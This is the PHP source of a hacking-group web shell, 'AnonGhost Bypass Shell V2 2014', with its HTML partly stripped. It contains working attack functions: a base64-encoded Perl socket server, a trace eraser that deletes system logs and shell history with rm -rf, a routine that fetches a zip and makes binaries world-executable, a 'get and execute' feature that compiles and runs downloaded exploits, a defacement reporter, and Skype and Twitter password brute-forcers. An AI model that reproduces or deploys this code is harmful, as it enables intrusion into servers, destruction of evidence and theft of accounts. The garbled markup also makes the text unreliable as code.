Sejarah


"; $about = "
AnonGhost Bypass Shell V2 2014

Coded by Virusa Worm - Mauritania Attacker | Special thankz to : AnonGhost Team


Greetz to :
AnonGhost - Teamp0ison - ZHC - Mauritania HaCker Team - 3xp1r3 Cyber Army - TeaMp0isoN - Robot Pirates - X-Blackerz INC. - Pak Cyber Pyrates - iMHATiMi.ORG - Afghan Cyber Army (ACA) - [ Tanpa Bicara - Maniak k4Sur [pasangan galo.. lol..]]

"; $ben = "


AnonGhost Bypass Shell V2 2014
Coded by Virusa Worm - Mauritania Attacker


You Have Been BANNED using this Shell


AnonGhost Bypass Shell V2 2014 is created for Educational Purpose and testing on your own server, and not responsible for any misuse of it.

At first a Web Hacker was someone who would spend long hours trying to find bugs and exploit manually.
The term has now changed known as a Defacer nowadays.
Tools does not Made Hackers , Hackers make Tools.
Do not Learn To Hack , Hack to Learn.wkkwk..

\"Keep Calm and enjoy Hacking \!/\"


Special thankz to : AnonGhost Team



Greetz to :
AnonGhost - Teamp0ison - ZHC - Mauritania HaCker Team - 3xp1r3 Cyber Army - TeaMp0isoN - Robot Pirates - X-Blackerz INC. - Pak Cyber Pyrates - iMHATiMi.ORG - Afghan Cyber Army (ACA) - [ Tanpa Bicara - Maniak k4Sur [pasangan galo.. lol..]]
"; $symlink = stripslashes(base64_decode("IyEvdXNyL2Jpbi9lbnYgcGVybA0KIyBkZXZpbHpjMGRlLm9yZyAoYykgMjAxMg0KDQp1c2UgU29ja2V0Ow0KDQokcG9ydCA9IDEzMTIzOw0KDQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoXCd0Y3BcJyk7DQpzb2NrZXQoUywmUEZfSU5FVCwmU09DS19TVFJFQU0sJHByb3RvY29sKSB8fCBkaWU7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kIChTLHNvY2thZGRyX2luKCRwb3J0LElOQUREUl9BTlkpKSB8fCBkaWU7DQpsaXN0ZW4gKFMsMykgfHwgZGllOw0Kd2hpbGUoMSl7DQoJYWNjZXB0IChDT05OLFMpOw0KCSRyZXE9PENPTk4+OyBjaG9tcCgkcmVxKTsgJHJlcT1+cy9cXHIvL2c7DQoJJHJlcSA9fiBzL1xcJShbQS1GYS1mMC05XXsyfSkvcGFjayhcJ0NcJywgaGV4KCQxKSkvc2VnOw0KCQ0KCXByaW50ICRyZXEuXCJcXHJcXG5cIjsNCgkNCgkkaGVhZGVycyA9IFwiSFRUUC8xLjEgMjAwIE9LXFxyXFxuXCI7DQoJJGhlYWRlcnMgLj0gXCJTZXJ2ZXI6IFBlcmxcXHJcXG5cIjsNCgkNCgkkdGFyZ2V0ID0gJHJlcTsNCglpZigkcmVxID1+IC9HRVQgLiogSFRUUC4qLyl7DQoJCSR0YXJnZXQgPX4gcy9HRVRcXCAvLzsNCgkJJHRhcmdldCA9fiBzL1xcIEhUVFAuKi8vOw0KCQkkcmVzcCA9IFwiXCI7DQoJCWlmKC1kICR0YXJnZXQpew0KCQkJaWYoISgkdGFyZ2V0ID1+IC8uKlxcLyskLykpew0KCQkJCSR0YXJnZXQgPSAkdGFyZ2V0LlwiL1wiOw0KCQkJfQ0KCQkJDQoJCQkkcmVzcCA9IFwiPCFET0NUWVBFIGh0bWwgUFVCTElDIFxcXCItLy9XM0MvL0RURCBIVE1MIDMuMiBGaW5hbC8vRU5cXFwiPg0KCQkJCQk8aHRtbD4NCgkJCQkJPHRpdGxlPkRpcmVjdG9yeSBsaXN0aW5nIGZvciBcIi4kdGFyZ2V0LlwiPC90aXRsZT4NCgkJCQkJPGJvZHk+DQoJCQkJCTxoMj5EaXJlY3RvcnkgbGlzdGluZyBmb3IgXCIuJHRhcmdldC5cIjwvaDI+DQoJCQkJCTxocj48dWw+XCI7DQoJCQkJCQ0KCQkJaWYob3BlbmRpcihESVIsJHRhcmdldCkpew0KCQkJCXdoaWxlKCRmaWxlID0gcmVhZGRpcihESVIpKXsNCgkJCQkJaWYoLWQgJHRhcmdldC4kZmlsZSl7DQoJCQkJCQlpZigoJGZpbGUgZXEgXCIuXCIpIHx8ICgkZmlsZSBlcSBcIi4uXCIpKXsgbmV4dDsgfQ0KCQkJCQkJJHJlc3AgLj0gXCI8bGk+PGEgaHJlZj1cXFwiXCIuJHRhcmdldC4kZmlsZS5cIi9cXFwiPlwiLiRmaWxlLlwiLzwvYT48L2xpPlxcclxcblwiOw0KCQkJCQl9DQoJCQkJCWVsc2lmKC1mICR0YXJnZXQuJGZpbGUpew0KCQkJCQkJJHJlc3AgLj0gXCI8bGk+PGEgaHJlZj1cXFwiXCIuJHRhcmdldC4kZmlsZS5cIlxcXCI+XCIuJGZpbGUuXCI8L2E+PC9saT5cXHJcXG5cIjsNCgkJCQkJfQ0KCQkJCX0NCgkJCQljbG9zZWRpcihESVIpOw0KCQkJfQ0KDQoJCQkkcmVzcCAuPSBcIjwvdWw+PGhyPg0KCQkJCQk8L2JvZHk+DQoJCQkJCTwvaHRtbD5cIjsNCgkJCQkJDQoJCQkkY29ubGVuID0gbGVuZ3RoKCRyZXNwKTsNCgkJCSRjb250eXBlID0gXCJ0ZXh0L2h0bWxcIjsNCgkJCXByaW50IFwiRGlyIDogXCIuJHRhcmdldC5cIlxcclxcblwiOw0KCQl9DQoJCWVsc2lmKC1mICR0YXJnZXQpew0KCQkJJGNvbmxlbiA9IC1zICR0YXJnZXQ7DQoJCQkkY29udHlwZSA9IFwidGV4dC9wbGFpblwiOw0KCQkJcHJpbnQgXCJGaWxlIDogXCIuJHRhcmdldC5cIiAoXCIuJGNvbmxlbi5cIilcXHJcXG5cIjsNCgkJfQ0KDQoJCXByaW50IFwiY29udHlwZSA6IFwiLiRjb250eXBlLlwiXFxyXFxuXCI7DQoJCXByaW50IFwiY29ubGVuIDogXCIuJGNvbmxlbi5cIlxcclxcblwiOw0KCQkNCgkJJGhlYWRlcnMgLj0gXCJDb250ZW50LVR5cGU6IFwiLiRjb250eXBlLlwiXFxyXFxuXCI7DQoJCSRoZWFkZXJzIC49IFwiQ29udGVudC1MZW5ndGg6IFwiLiRjb25sZW4uXCJcXHJcXG5cIjsNCgkNCgkJcHJpbnQgQ09OTiAkaGVhZGVycy5cIlxcclxcblwiOw0KCQkNCgkJaWYoLWQgJHRhcmdldCl7DQoJCQlwcmludCBDT05OICRyZXNwOw0KCQl9DQoJCWVsc2lmKC1mICR0YXJnZXQpew0KCQkJaWYob3BlbihGSUxFLCR0YXJnZXQpKXsNCgkJCQliaW5tb2RlIEZJTEU7DQoJCQkJd2hpbGUgKCgkbiA9IHJlYWQgRklMRSwgJGRhdGEsIDEwMjQpICE9IDApIHsgDQoJCQkJCXByaW50IENPTk4gJGRhdGE7DQoJCQkJfSANCgkJCQljbG9zZShGSUxFKTsgDQoJCQl9DQoJCX0NCgl9DQoJY2xvc2UgQ09OTjsNCn0NCmV4aXQgMDs=")); function Zip($source, $destination) { if (!extension_loaded('zip') || !file_exists($source)) { return false; } $zip = new ZipArchive(); if (!$zip->open($destination, ZIPARCHIVE::CREATE)) { return false; } $source = str_replace('\\', '/', realpath($source)); if (is_dir($source) === true) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST); foreach ($files as $file) { $file = str_replace('\\', '/', realpath($file)); if (is_dir($file) === true) { $zip->addEmptyDir(str_replace($source . '/', '', $file . '/')); } else if (is_file($file) === true) { $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file)); } } } else if (is_file($source) === true) { $zip->addFromString(basename($source), file_get_contents($source)); } return $zip->close(); } function getperms ($file) { $perm = substr(sprintf('%o', fileperms($file)), -4); return $perm; } if(isset($_GET['zip'])) { $src = $_GET['zip']; $dst = getcwd()."/".basename($_GET['zip']).".zip"; if (Zip($src, $dst) != false) { $filez = file_get_contents($dst); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\"".basename($dst)."\";"); echo $filez; } exit; } function showDrives() { global $self; foreach(range('A','Z') as $drive) { if(is_dir($drive.':\\')) { ?>      $mod; $i++) { $size /= $mod; } return round($size, 2) . ' ' . $units[$i]; } function getFilePermissions($file) { $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function dirSize($directory) { $size = 0; foreach(new RecursiveIteratorIterator(new RecursiveDirectoryIterator($directory)) as $file){ try { $size += $file->getSize(); } catch (Exception $e){ // Symlinks and other shits $size += 0; } } return $size; } function ZoneH($url, $hacker, $hackmode,$reson, $site ) { $k = curl_init(); curl_setopt($k, CURLOPT_URL, $url); curl_setopt($k,CURLOPT_POST,true); curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson); curl_setopt($k,CURLOPT_FOLLOWLOCATION, true); curl_setopt($k, CURLOPT_RETURNTRANSFER, true); $kubra = curl_exec($k); curl_close($k);return $kubra; } ?> AnonGhost Bypass Shell V2 2014 '.base64_decode("PGltZyBzcmM9Imh0dHA6Ly93d3c0LjB6ejAuY29tLzIwMTQvMDgvMjIvMjEvNTQ0NTQ1NzY2LmpwZyIgLz4=").'
' ; echo '
'; echo '
Kernel Version : ';echo php_uname(); echo ''; echo '
PHP Version: ';echo phpversion(); echo ' | Current User : ';echo get_current_user(); echo ' | User ID : ';echo getmyuid(); echo ' | Group : ';echo getmygid(); echo ' | Cwd : ';echo getcwd(); echo '

'; ?>

Safe mode: ON -'; } else{ echo ' Safe mode: OFF -'; } if(ini_get('magic_quotes_gpc') == '1'){ echo ' Magic_quotes_gpc: ON -'; } else{ echo ' Magic_quotes_gpc: OFF -'; } if(function_exists('mysql_connect')){ echo ' Mysql: ON -'; } else{ echo ' Mysql: OFF -'; } if(function_exists('mssql_connect')){ echo ' Mssql: ON -'; } else{ echo ' Mssql: OFF -'; } if(function_exists('pg_connect')){ echo ' PostgreSQL: ON -'; } else{ echo ' PostgreSQL: OFF -'; } if(function_exists('ocilogon')){ echo ' Oracle: ON -'; } else{ echo ' Oracle: OFF -'; } if(function_exists('curl_version')){ echo ' Curl: ON -'; } else{ echo ' Curl: OFF -'; } if(function_exists('exec')){ echo ' Exec: ON -'; } else{ echo ' Exec: OFF -'; } if(!ini_get('open_basedir') != "on"){ echo ' Open_basedir: OFF -'; } else{ echo ' Open_basedir: ON -'; } if(!ini_get('ini_restore') != "on"){ echo ' Ini_restore: OFF -'; } else{ echo ' Ini_restore: ON -'; } if(function_exists('symlink')){ echo ' Symlink: ON -'; } else{ echo ' Symlink: OFF -'; } if(function_exists('file_get_contents')){ echo ' file_get_contents: ON -'; } else{ echo ' file_get_contents: OFF -'; } if(is_dir('sim/rut')){ echo ' Permission: ON -'; } else{ echo ' Permission: OFF '; } ?>
File saved'; } if(isset($_GET['turnoff'])){ if(is_writable(".htaccess")){ $value = $_GET['turnoff']; if(file_exists(".htaccess")){ // fread example $handle = fopen(".htaccess", "r"); $contents = ''; while (!feof($handle)) { $read = fread($handle, 8192); $contents = $contents.$read; ?>


Turn off php.ini

Use htaccess to turn php.ini functions on/off
Example: php_value magic_quotes_gpc off


File created click here
'; } ?> File created click here'; } else{ echo '
This file exist.     delete     open
'; } } if(isset($_GET['get'])){ // download $file = $_GET['get']; if (file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename='.basename($file)); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); ob_clean(); flush(); readfile($file); exit(); } } if(isset($_GET['view'])){ $file = $_GET['view']; ?>


Download Delete
Logs Eraser

'; //exec function madafuck ! echo "
"; exec("rm -rf /tmp/logs"); exec("rm -rf /root/.ksh_history"); exec("rm -rf /root/.bash_history"); exec("rm -rf /root/.bash_logout"); exec("rm -rf /usr/local/apache/logs"); exec("rm -rf /usr/local/apache/log"); exec("rm -rf /var/apache/logs"); exec("rm -rf /var/apache/log"); exec("rm -rf /var/run/utmp"); exec("rm -rf /var/logs"); exec("rm -rf /var/log"); exec("rm -rf /var/adm"); exec("rm -rf /etc/wtmp"); exec("rm -rf /etc/utmp"); exec("rm -rf $HISTFILE"); exec("rm -rf /var/log/lastlog"); exec("rm -rf /var/log/wtmp"); //shell_exec function madafuck ! shell_exec("rm -rf /tmp/logs"); shell_exec("rm -rf /root/.ksh_history"); shell_exec("rm -rf /root/.bash_history"); shell_exec("rm -rf /root/.bash_logout"); shell_exec("rm -rf /usr/local/apache/logs"); shell_exec("rm -rf /usr/local/apache/log"); shell_exec("rm -rf /var/apache/logs"); shell_exec("rm -rf /var/apache/log"); shell_exec("rm -rf /var/run/utmp"); shell_exec("rm -rf /var/logs"); shell_exec("rm -rf /var/log"); shell_exec("rm -rf /var/adm"); shell_exec("rm -rf /etc/wtmp"); shell_exec("rm -rf /etc/utmp"); shell_exec("rm -rf $HISTFILE"); shell_exec("rm -rf /var/log/lastlog"); shell_exec("rm -rf /var/log/wtmp"); //passthru function madafuck ! passthru("rm -rf /tmp/logs"); passthru("rm -rf /root/.ksh_history"); passthru("rm -rf /root/.bash_history"); passthru("rm -rf /root/.bash_logout"); passthru("rm -rf /usr/local/apache/logs"); passthru("rm -rf /usr/local/apache/log"); passthru("rm -rf /var/apache/logs"); passthru("rm -rf /var/apache/log"); passthru("rm -rf /var/run/utmp"); passthru("rm -rf /var/logs"); passthru("rm -rf /var/log"); passthru("rm -rf /var/adm"); passthru("rm -rf /etc/wtmp"); passthru("rm -rf /etc/utmp"); passthru("rm -rf $HISTFILE"); passthru("rm -rf /var/log/lastlog"); passthru("rm -rf /var/log/wtmp"); //Let the Mother of Functions To Complete The Task wkwkwkw xD! system("rm -rf /tmp/logs"); sleep(2); echo'
Deleted [+].../tmp/logs '; sleep(2); system("rm -rf /root/.bash_history"); sleep(2); echo'

Deleted [+].../root/.bash_history

'; system("rm -rf /root/.ksh_history"); sleep(2); echo'

Deleted [+].../root/.ksh_history

'; system("rm -rf /root/.bash_logout"); sleep(2); echo'

Deleted [+].../root/.bash_logout

'; system("rm -rf /usr/local/apache/logs"); sleep(2); echo'

Deleted [+].../usr/local/apache/logs

'; system("rm -rf /usr/local/apache/log"); sleep(2); echo'

Deleted [+].../usr/local/apache/log

'; system("rm -rf /var/apache/logs"); sleep(2); echo'

Deleted [+].../var/apache/logs

'; system("rm -rf /var/apache/log"); sleep(2); echo'

Deleted [+].../var/apache/log

'; system("rm -rf /var/run/utmp"); sleep(2); echo'

Deleted [+].../var/run/utmp

'; system("rm -rf /var/logs"); sleep(2); echo'

Deleted [+].../var/logs

'; system("rm -rf /var/log"); sleep(2); echo'

Deleted [+].../var/log

'; system("rm -rf /var/adm"); sleep(2); echo'

Deleted [+].../var/adm

'; system("rm -rf /etc/wtmp"); sleep(2); echo'

Deleted [+].../etc/wtmp

'; system("rm -rf /etc/utmp"); sleep(2); echo'

Deleted [+].../etc/utmp

'; system("rm -rf $HISTFILE"); sleep(2); echo'

Deleted [+]...$HISTFILE

'; system("rm -rf /var/log/lastlog"); sleep(2); echo'

Deleted [+].../var/log/lastlog

'; system("rm -rf /var/log/wtmp"); sleep(2); echo'

Deleted [+].../var/log/wtmp

'; sleep(4); echo '


Your Traces Has Been Successfully Erased From the Server'; echo"

"; } if(isset($_GET['action']) && $_GET['action'] == 'exgz'){ echo '
Bypass Server Functions - Test Permission - Server Informations
'; echo '
Bypass Server Functions 100% Priv8
'; echo '
Coded By Mauritania Attacker

Force Enabling Functions on the Server

Remote File Zip Functions


'; @error_reporting(0); /* * Coded By : Mauritania Attacker * Avalaibility : Priv99999999999 ! * This Tool is not for kids !! * GreetZ To All AnonGhost MemberZ */ $file = $_POST['shell']; //Generate zip file $fopen = fopen("ghost.zip",'w'); $shell = @file_get_contents($file); $swrite = fwrite($fopen ,$shell); if($swrite){ echo "
"; echo "Zip Functions Uploaded Successfully\n
"; sleep(2); echo "

Going To Unzip All Functions Now Be patient Nygga ....


"; sleep(2); //system system('unzip ghost.zip'); chmod("id" , 0777); chmod("gunzip" , 0777); chmod("pwd" , 0777); chmod("ln" , 0777); chmod("ls" , 0777); chmod("chmod" , 0777); chmod("uname" , 0777); chmod("rm" , 0777); chmod("su" , 0777); chmod("tail" , 0777); chmod("Ptouch" , 0777); chmod("who" , 0777); chmod("gcc" , 0777); chmod("tar" , 0777); chmod("du" , 0777); chmod("dir" , 0777); chmod("wget" , 0777); chmod("date" , 0777); chmod("gzip" , 0777); chmod("sh" , 0777); //passthru passthru('unzip ghost.zip'); chmod("id" , 0777); chmod("gunzip" , 0777); chmod("pwd" , 0777); chmod("ln" , 0777); chmod("ls" , 0777); chmod("chmod" , 0777); chmod("uname" , 0777); chmod("rm" , 0777); chmod("su" , 0777); chmod("tail" , 0777); chmod("Ptouch" , 0777); chmod("who" , 0777); chmod("gcc" , 0777); chmod("tar" , 0777); chmod("du" , 0777); chmod("dir" , 0777); chmod("wget" , 0777); chmod("date" , 0777); chmod("gzip" , 0777); chmod("sh" , 0777); //shell_exec shell_exec('unzip ghost.zip'); chmod("id" , 0777); chmod("gunzip" , 0777); chmod("pwd" , 0777); chmod("ln" , 0777); chmod("ls" , 0777); chmod("chmod" , 0777); chmod("uname" , 0777); chmod("rm" , 0777); chmod("su" , 0777); chmod("tail" , 0777); chmod("Ptouch" , 0777); chmod("who" , 0777); chmod("gcc" , 0777); chmod("tar" , 0777); chmod("du" , 0777); chmod("dir" , 0777); chmod("wget" , 0777); chmod("date" , 0777); chmod("gzip" , 0777); chmod("sh" , 0777); //exec exec('unzip ghost.zip'); chmod("id" , 0777); chmod("gunzip" , 0777); chmod("pwd" , 0777); chmod("ln" , 0777); chmod("ls" , 0777); chmod("chmod" , 0777); chmod("uname" , 0777); chmod("rm" , 0777); chmod("su" , 0777); chmod("tail" , 0777); chmod("Ptouch" , 0777); chmod("who" , 0777); chmod("gcc" , 0777); chmod("tar" , 0777); chmod("du" , 0777); chmod("dir" , 0777); chmod("wget" , 0777); chmod("date" , 0777); chmod("gzip" , 0777); chmod("sh" , 0777); //proc_open proc_open('unzip ghost.zip'); chmod("id" , 0777); chmod("gunzip" , 0777); chmod("pwd" , 0777); chmod("ln" , 0777); chmod("ls" , 0777); chmod("chmod" , 0777); chmod("uname" , 0777); chmod("rm" , 0777); chmod("su" , 0777); chmod("tail" , 0777); chmod("Ptouch" , 0777); chmod("who" , 0777); chmod("gcc" , 0777); chmod("tar" , 0777); chmod("du" , 0777); chmod("dir" , 0777); chmod("wget" , 0777); chmod("date" , 0777); chmod("gzip" , 0777); chmod("sh" , 0777); sleep(3); echo "

Loading Perl Functions....

"; //chmod.pl generate $shellw0rm = 'eyANCnN5c3RlbSgidW56aXAgZ2hvc3QuemlwIik7DQpzeXN0ZW0oImNobW9kIDc3NyBpZCIpOw0Kc3lzdGVtKCJjaG1vZCA3NzcgZ3VuemlwIik7DQpzeXN0ZW0oImNobW9kIDc3NyBwd2QiKTsNCnN5c3RlbSgiY2htb2QgNzc3IGxuIik7DQpzeXN0ZW0oImNobW9kIDc3NyBscyIpOw0Kc3lzdGVtKCJjaG1vZCA3NzcgcHdkIik7DQpzeXN0ZW0oImNobW9kIDc3NyBjaG1vZCIpOw0Kc3lzdGVtKCJjaG1vZCA3NzcgdW5hbWUiKTsNCnN5c3RlbSgiY2htb2QgNzc3IHJtIik7DQpzeXN0ZW0oImNobW9kIDc3NyBjYXQiKTsNCnN5c3RlbSgiY2htb2QgNzc3IHN1Iik7DQpzeXN0ZW0oImNobW9kIDc3NyB0YWlsIik7DQpzeXN0ZW0oImNobW9kIDc3NyB0b3VjaCIpOw0Kc3lzdGVtKCJjaG1vZCA3Nzcgd2hvIik7DQpzeXN0ZW0oImNobW9kIDc3NyBnY2MiKTsNCnN5c3RlbSgiY2htb2QgNzc3IHJtIik7DQpzeXN0ZW0oImNobW9kIDc3NyB0YXIiKTsNCnN5c3RlbSgiY2htb2QgNzc3IGR1Iik7DQpzeXN0ZW0oImNobW9kIDc3NyBkaXIiKTsNCnN5c3RlbSgiY2htb2QgNzc3IHdnZXQiKTsNCnN5c3RlbSgiY2htb2QgNzc3IGRhdGUiKTsNCnN5c3RlbSgiY2htb2QgNzc3IGd6aXAiKTsNCnN5c3RlbSgiY2htb2QgNzc3IHNoIik7DQp9'; $chmoderr = fopen("chmod.pl" ,"w+"); $write = fwrite ($chmoderr ,base64_decode($shellw0rm)); if($write){ echo "

Perl Modules Uploaded Successfully


"; fclose($chmoderr); chmod("chmod.pl",0755); //Extracting htaccess to enable perl handler and type all depends on the server :D $htaccess = 'T3B0aW9ucyBJbmNsdWRlcyBJbmNsdWRlc05PRVhFQyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ0KDQpBZGRUeXBlIGFwcGxpY2F0aW9uL3gtaHR0cGQtY2dpIC5wbA0KQWRkVHlwZSBhcHBsaWNhdGlvbi94LWh0dHBkLWNnaSAucGwNCg0KQWRkSGFuZGxlciBjZ2ktc2NyaXB0IC5wbA0KQWRkSGFuZGxlciBjZ2ktc2NyaXB0IC5wbA=='; $lol = fopen(".htaccess" ,"w+"); $dwrite = fwrite ($lol ,base64_decode($htaccess)); fclose($chmoderr); sleep(2); //unzip with perl , if php can't do unzip perl maybe can echo "

Unzipping Functions with Perl


"; system('perl chmod.pl'); passthru('perl chmod.pl'); shell_exec('perl chmod.pl'); exec('perl chmod.pl'); proc_open('perl chmod.pl'); echo"
"; } } } if(isset($_GET['action']) && $_GET['action'] == 'iplookdom'){ echo "
Ip Lookup Reverse Domain By Mauritania Attacker
"; echo "
"; echo "

 
"; if(isset($_GET["ghost"])) { $site = $_GET["ghost"]; $ghost = "http://domains.yougetsignal.com/domains.php"; //Curl Function $ch = curl_init($ghost); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 ); curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$site&ket="); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_POST, 1); $resp = curl_exec($ch); $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) )))); $array = explode(",,", $resp); unset($array[0]); echo ""; foreach($array as $lnk) { print ""; } echo "
$lnk
"; curl_close($ch); } } if(isset($_GET['action']) && $_GET['action'] == 'srvrinformations'){ echo '
Bypass Server Functions - Test Permission - Server Informations
'; echo "
Server Security Informations

"; echo "
Kernel Version";echo php_uname(); echo "
Web Server";echo $_SERVER["SERVER_SOFTWARE"]; echo "
PHP Version";echo phpversion(); echo " on "; echo php_sapi_name(); echo "
Current User";echo get_current_user(); echo "
User ID";echo getmyuid(); echo "
Group";echo getmygid(); echo "
Cwd ";echo getcwd(); echo "
Admin Server";echo $_SERVER['SERVER_ADMIN']; echo "
Server Port";echo $_SERVER['SERVER_PORT']; echo "
Server IP";echo $serverIP = gethostbyname($_SERVER["HTTP_HOST"]); echo "
Client IP";echo $_SERVER['REMOTE_ADDR']; echo "
cURL support";echo function_exists('curl_version')?'Enabled':'No'; echo "
Readable /etc/passwd";echo @is_readable('/etc/passwd')?"Readable [View]":"Not Readable"; echo "
Readable /etc/shadow";echo @is_readable('/etc/shadow')?"Readable":"Not Readable"; $base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON secure":"OFF not secure"; echo "
Open Base Dir" . $base . ""; echo "

"; } if(isset($_GET['action']) && $_GET['action'] == 'tespr'){ echo '
Bypass Server Functions - Test Permission - Server Informations
'; echo '
Test Permission

'; echo '
'; echo ''; if(ini_get('id') == '1'){ echo ''; } else{ echo ''; } if(ini_get('gunzip') == '1'){ echo ''; } else{ echo ''; } if(ini_get('pwd') == '1'){ echo ''; } else{ echo ''; } if(ini_get('ln') == '1'){ echo ''; } else{ echo ''; } if(ini_get('ls') == '1'){ echo ''; } else{ echo ''; } if(ini_get('chmod') == '1'){ echo ''; } else{ echo ''; } echo ''; if(ini_get('uname') == '1'){ echo ''; } else{ echo ''; } if(ini_get('rm') == '1'){ echo ''; } else{ echo ''; } if(ini_get('su') == '1'){ echo ''; } else{ echo ''; } if(ini_get('tail') == '1'){ echo ''; } else{ echo ''; } if(ini_get('Ptouch') == '1'){ echo ''; } else{ echo ''; } if(ini_get('who') == '1'){ echo ''; } else{ echo ''; } echo ''; if(ini_get('gcc') == '1'){ echo ''; } else{ echo ''; } if(ini_get('tar') == '1'){ echo ''; } else{ echo ''; } if(ini_get('du') == '1'){ echo ''; } else{ echo ''; } if(ini_get('dir') == '1'){ echo ''; } else{ echo ''; } if(ini_get('wget') == '1'){ echo ''; } else{ echo ''; } if(ini_get('date') == '1'){ echo ''; } else{ echo ''; } echo ''; if(ini_get('gzip') == '1'){ echo ''; } else{ echo ''; } if(ini_get('sh') == '1'){ echo ''; } else{ echo ''; } echo ''; echo '
 id:  ON  id:  OFF  | gunzip:  ON  | gunzip:  OFF  | pwd: ON  | pwd: OFF  | ln: ON  | ln: OFF  | ls: ON  | ls: OFF  | chmod: ON  | chmod: OFF 
 uname: ON  uname: OFF  | rm: ON  | rm: OFF  | su: ON  | su: OFF  | tail: ON  | tail: OFF  | Ptouch: ON  | Ptouch: OFF  | who: ON  | who: OFF 
  gcc: ON   gcc: OFF  | tar: ON  | tar: OFF  | du: ON  | du: OFF  | dir: ON  | dir: OFF  | wget: ON  | wget: OFF  | date: ON  | date: OFF 
  gzip: ON   gzip: OFF  | sh: ON  | sh: OFF 
'; } if(isset($_GET['action']) && $_GET['action'] == 'exploit'){ echo '
MySQL & PostgreSql Connect - Command Execution - Base64 Command - Config Grabber - Subdomain Checker - Joomla Reverse Server - Wordpress Reverse Server - Find Directory Writable/Readable - Zone-h Notifier - Shtml Command Shell - Back connect Simple - Ruby BackConnect - Perl BackConnect - Python BackConnect - Exploit - Whcms Killer - Webmail Password Changer - Wordpress Csrf Exploit
'; echo '
Exploit
'; ?>

Get and execute

Type:
'; if(function_exists("wget")){ wget($_GET['exp_url']); echo $_GET['exp_url'].' got in here'; if(function_exists("system")){ if(isset($_GET['run'])){ $run = $_GET['run']; if($run = 'c++ | .cpp'){ system("gcc -o exploit ".$_GET['exp_url'].";chmod +x exploit;./exploit;"); } if($run = 'perl | .pl'){ } if($run = 'python | .py'){ } if($run = 'ruby | .rb'){ } } } else{ echo 'System command disabled'; } } else{ echo('wget disabled'); } echo '
'; } if(isset($_GET['action']) && $_GET['action'] == 'skybru'){ echo '
Skype Brute Force - Cpanel Brute Force - Joomla Brute Force - Wordpress Brute Force - Twitter Brute Force - Gmail & Hotmail Brute Force
'; echo '
Skype Brute Force
'; ob_start(); @set_time_limit(0); #Skype BruteForce Developped By noname-haxor from AnonGhost Team (Thanks To Mauritania Attacker) #Idea By : Mauritania Attacker echo "




"; if($_POST['username'] and $_POST['password']){ #function function brute($user,$pass) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://login.skype.com/login"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$user}&password={$pass}"); curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/34.0.1847.116"); $login = curl_exec($ch); if(eregi("message message_error", $login)){ echo "

Not the right one :( || Username : $user  Password : $pass




"; }else{ echo "

You Are Lucky Password Found ! || Username: $user  Password : $pass




"; } } $username = explode(" ", $_POST['username']); $password = explode(" ", $_POST['password']); foreach($username as $users) { $users = @trim($users); foreach($password as $pass) { $pass = @trim($pass); brute($users,$pass); }} } } if(isset($_GET['action']) && $_GET['action'] == 'twbru'){ echo '
Skype Brute Force - Cpanel Brute Force - Joomla Brute Force - Wordpress Brute Force - Twitter Brute Force - Gmail & Hotmail Brute Force
'; echo '
Twitter Multi-Account BruteForce
Coded By Mauritania Attacker


'; echo "





